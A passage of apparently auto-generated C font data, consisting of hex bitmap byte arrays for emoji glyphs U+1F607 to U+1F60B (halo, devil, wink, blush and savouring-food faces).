0xf, 0x80, 0x3c, 0xe0, 0x1, 0xf0, 0x0, 0x0,
0x1f, 0x0, 0xe, 0x70, 0x0, 0x3e, 0x0, 0x0,
0x3e, 0x0, 0x7, 0x38, 0x0, 0x7, 0xc0, 0x0,
0x7c, 0x0, 0x3, 0xb8, 0x0, 0x0, 0xf8, 0x0,
0xf8, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x1f, 0x1,
0xf0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x7f, 0x80,
0xff, 0x0, 0x0, 0x3f, 0x0, 0x3, 0xfc, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0xf, 0xf0, 0x0,
0x0, 0x7f, 0x80, 0xf, 0xc0, 0xf, 0xc0, 0x0,
0x0, 0x7, 0xe0, 0x7, 0xe0, 0x6, 0x0, 0x0,
0x0, 0x0, 0x30, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x7f, 0x0,
0x0, 0x0, 0x7, 0xf0, 0x1c, 0xe0, 0x30, 0xfe,
0x0, 0x0, 0xff, 0xf8, 0xe, 0x70, 0x18, 0x0,
0xff, 0xff, 0xf0, 0xc, 0x7, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x8e, 0x7, 0xfc,
0x0, 0x0, 0x0, 0xff, 0x3, 0x87, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xc1, 0xc0, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc0, 0xe0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x78, 0xf,
0xff, 0xff, 0xff, 0xff, 0x80, 0xe0, 0x1c, 0x3,
0xff, 0xff, 0xff, 0xff, 0x80, 0x70, 0x7, 0x0,
0xff, 0xfc, 0x1f, 0xff, 0x80, 0x70, 0x3, 0xc0,
0x1f, 0xf0, 0x1, 0xff, 0x0, 0x78, 0x0, 0xe0,
0x7, 0xf0, 0x0, 0x7f, 0x0, 0x38, 0x0, 0x38,
0x0, 0xf8, 0x0, 0x3e, 0x0, 0x38, 0x0, 0x1e,
0x0, 0xf, 0x80, 0xf8, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x7f, 0xc0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F607 "😇" */
0x0, 0x0, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x3, 0xff, 0xe0, 0x0, 0x1f, 0xff, 0x0, 0x0,
0x7f, 0xe0, 0x0, 0x0, 0x1, 0xff, 0x80, 0x7,
0xfc, 0x0, 0x0, 0x0, 0x0, 0xff, 0xc0, 0x7f,
0x80, 0x1, 0xff, 0xe0, 0x0, 0xff, 0x83, 0xfc,
0x0, 0x7f, 0xff, 0xf8, 0x0, 0xff, 0x1f, 0xe0,
0xf, 0xf0, 0x3, 0xfc, 0x1, 0xfe, 0xff, 0x0,
0xfc, 0x0, 0x0, 0xfc, 0x3, 0xff, 0xfc, 0x7,
0x80, 0x0, 0x0, 0x78, 0xf, 0xf7, 0xf8, 0x78,
0x0, 0x0, 0x0, 0x78, 0x7f, 0xdf, 0xf3, 0xc0,
0x0, 0x0, 0x0, 0xf3, 0xfe, 0x3f, 0xfc, 0x0,
0x0, 0x0, 0x0, 0xff, 0xf0, 0x7f, 0xf8, 0x0,
0x0, 0x0, 0x7, 0xff, 0x80, 0xff, 0xff, 0x80,
0x0, 0x7, 0xff, 0xfc, 0x0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc0, 0x1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x0, 0xe, 0x7f, 0xff, 0xff,
0xff, 0xff, 0x9c, 0x0, 0x78, 0x1f, 0xff, 0xff,
0xff, 0xc0, 0x78, 0x1, 0xc0, 0x1, 0xff, 0xff,
0xc0, 0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x38, 0x0, 0x3e, 0x0, 0x1, 0xf0, 0x0,
0x71, 0xc0, 0x3, 0xfe, 0x0, 0x1f, 0xf0, 0x0,
0xe7, 0x0, 0x1e, 0x1c, 0x0, 0xe0, 0xe0, 0x3,
0x9c, 0x0, 0xe0, 0x38, 0x7, 0x1, 0xc0, 0xe,
0x70, 0x1, 0x0, 0x40, 0x8, 0x2, 0x0, 0x39,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x9c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x9c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe, 0x0, 0x4,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x0, 0x18,
0x0, 0x0, 0x60, 0x0, 0xe0, 0x70, 0x0, 0xfc,
0x0, 0xf, 0xc0, 0x3, 0x81, 0xc0, 0x0, 0xfe,
0x1, 0xfc, 0x0, 0xe, 0x3, 0x80, 0x0, 0x7f,
0xff, 0x80, 0x0, 0x70, 0xe, 0x0, 0x0, 0x3f,
0xf0, 0x0, 0x1, 0xc0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0xf, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0xf8, 0x0, 0x0, 0x7, 0xc0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0xfc, 0x0,
0x0, 0x0, 0x0, 0xff, 0x0, 0x1f, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0, 0x0,
/* U+1F608 "😈" */
0x20, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x11, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xef, 0xc0, 0x0, 0x0, 0x7f, 0xf8, 0x0,
0x0, 0xf, 0xfb, 0x80, 0x0, 0x1f, 0xff, 0xfe,
0x0, 0x0, 0x73, 0xe7, 0x0, 0x3, 0xf8, 0x0,
0x7f, 0x0, 0x3, 0x8f, 0x8f, 0x0, 0x3e, 0x0,
0x0, 0x3f, 0x0, 0x3c, 0x3e, 0x1e, 0x3, 0xe0,
0x0, 0x0, 0x1f, 0x1, 0xe1, 0xf8, 0x1e, 0x3e,
0x0, 0x0, 0x0, 0x1f, 0x1f, 0x7, 0xe0, 0x3f,
0xe0, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0x1f, 0x80,
0x3f, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x80, 0x77,
0x0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x30, 0x1,
0xdc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x6, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x39, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x8e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x60, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x30, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x81, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x60, 0x0,
0xe0, 0x0, 0x0, 0x1, 0xc0, 0x1, 0xc1, 0x80,
0x3, 0xe0, 0x0, 0x0, 0x1f, 0x0, 0x7, 0x6,
0x0, 0x7, 0xe0, 0x0, 0x1, 0xf8, 0x0, 0x1c,
0x18, 0x0, 0x7, 0xe0, 0x0, 0x1f, 0x80, 0x0,
0x70, 0x60, 0x0, 0xf, 0xc0, 0x0, 0xfc, 0x0,
0x1, 0xc1, 0x80, 0x0, 0x3f, 0xc0, 0xf, 0xf0,
0x0, 0x7, 0x6, 0x0, 0x1, 0xff, 0x80, 0x7f,
0xe0, 0x0, 0x1c, 0x18, 0x0, 0x7, 0xfc, 0x0,
0xff, 0x80, 0x0, 0x70, 0x60, 0x0, 0x1f, 0xe0,
0x1, 0xfe, 0x0, 0x1, 0xc1, 0x80, 0x0, 0x7f,
0x80, 0x7, 0xf8, 0x0, 0x7, 0x7, 0x0, 0x0,
0xfc, 0x0, 0xf, 0xc0, 0x0, 0x3c, 0x1c, 0x0,
0x3, 0xf0, 0x0, 0x3e, 0x0, 0x0, 0xe0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0xc0, 0x0, 0x30, 0x0,
0x3, 0x0, 0x0, 0xe0, 0x3, 0x80, 0x1, 0xe0,
0x0, 0x1e, 0x0, 0x7, 0x0, 0x6, 0x0, 0x3,
0xe0, 0x1, 0xf0, 0x0, 0x1c, 0x0, 0x1c, 0x0,
0x3, 0xf0, 0x3f, 0x0, 0x0, 0xe0, 0x0, 0x38,
0x0, 0x3, 0xff, 0xf0, 0x0, 0x7, 0x80, 0x0,
0x60, 0x0, 0x1, 0xfe, 0x0, 0x0, 0x1c, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0xfc, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0,
0x0, 0x0,
/* U+1F609 "😉" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x70, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x60, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0xe, 0x70, 0x0, 0xf, 0x0, 0x0,
0x7, 0xc0, 0x7, 0x38, 0x0, 0xf, 0xc0, 0x0,
0xf, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0xf, 0x80, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0xf, 0x0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0x0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x1f, 0xc0, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x7, 0xfe, 0x0, 0xf, 0xc0, 0x0, 0x3f, 0x0,
0x3, 0xff, 0xc0, 0x7, 0xe0, 0x0, 0xf, 0x0,
0x0, 0x1, 0xe0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x20, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x7,
0x0, 0x0, 0x3, 0x0, 0x3, 0x87, 0x0, 0x3,
0xc0, 0x0, 0x7, 0xc0, 0x1, 0xc1, 0xc0, 0x0,
0xf8, 0x0, 0xf, 0x80, 0x1, 0xc0, 0xe0, 0x0,
0x1f, 0xc0, 0x3f, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x1, 0xff, 0xfe, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x1f, 0xf8, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F60A "😊" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x3e, 0x0, 0x0,
0xf8, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x1,
0xfe, 0x0, 0x7, 0x38, 0x0, 0x38, 0x70, 0x1,
0xc3, 0x80, 0x3, 0xb8, 0x0, 0x38, 0x18, 0x0,
0xc0, 0xe0, 0x0, 0xfc, 0x0, 0x18, 0xe, 0x0,
0xe0, 0x30, 0x0, 0x7e, 0x0, 0x1c, 0x3, 0x0,
0x60, 0x1c, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x10, 0x0,
0x0, 0x0, 0x20, 0x1, 0xf8, 0x1, 0x99, 0x0,
0x0, 0x1, 0x33, 0x0, 0xfc, 0x0, 0xc9, 0x80,
0x0, 0x1, 0x99, 0x80, 0x7e, 0x0, 0xcc, 0xc0,
0x0, 0x0, 0x89, 0x80, 0x3f, 0x0, 0x64, 0xc0,
0x0, 0x0, 0xcc, 0xc0, 0x3d, 0xc0, 0x66, 0x60,
0x0, 0x0, 0x64, 0x40, 0x1c, 0xe0, 0x2, 0x0,
0x0, 0x0, 0x6, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x60, 0x0, 0x3, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x3c, 0x0, 0x7, 0x80, 0x0, 0xe0, 0x78, 0x0,
0xf, 0xc0, 0x1f, 0x80, 0x0, 0xe0, 0x1c, 0x0,
0x1, 0xff, 0xff, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0xf, 0xf8, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F60B "😋" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x18, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x61, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x39, 0xe0, 0x0, 0xf8, 0x0, 0x0,
0xfc, 0x0, 0x1c, 0xe0, 0x1, 0xff, 0x0, 0x1,
0xff, 0x80, 0x6, 0x70, 0x1, 0xc1, 0xe0, 0x1,
0xe1, 0xe0, 0x3, 0x38, 0x1, 0xc0, 0x70, 0x1,
0xc0, 0x78, 0x1, 0xf8, 0x0, 0xc0, 0x18, 0x0,
0xc0, 0x18, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7c, 0x8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x30, 0x3e, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x3f, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x1d, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xe, 0xe, 0xe0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x6, 0x70, 0x38, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0x7, 0x83, 0x8e, 0x7, 0x80,
0x0, 0x0, 0x0, 0x7, 0xe1, 0x87, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x7, 0x79, 0xc1, 0xc0, 0x70,
0x0, 0x0, 0x0, 0x7, 0x1e, 0xe0, 0xe0, 0x1e,
0x0, 0x0, 0x0, 0x7, 0x7, 0xe0, 0x78, 0x7,
0x80, 0x0, 0x0, 0x7, 0x1, 0xf0, 0x1c, 0x1,
0xe0, 0x0, 0x0, 0xf, 0x0, 0x70, 0x7, 0x0,
0x3c, 0x0, 0x0, 0x1f, 0x80, 0x1c, 0x3, 0xc0,
0xf, 0x80, 0x0, 0x3f, 0xe0, 0xe, 0x0, 0xe0,
0x1, 0xfc, 0x0, 0xfc, 0x78, 0x3, 0x80, 0x38,
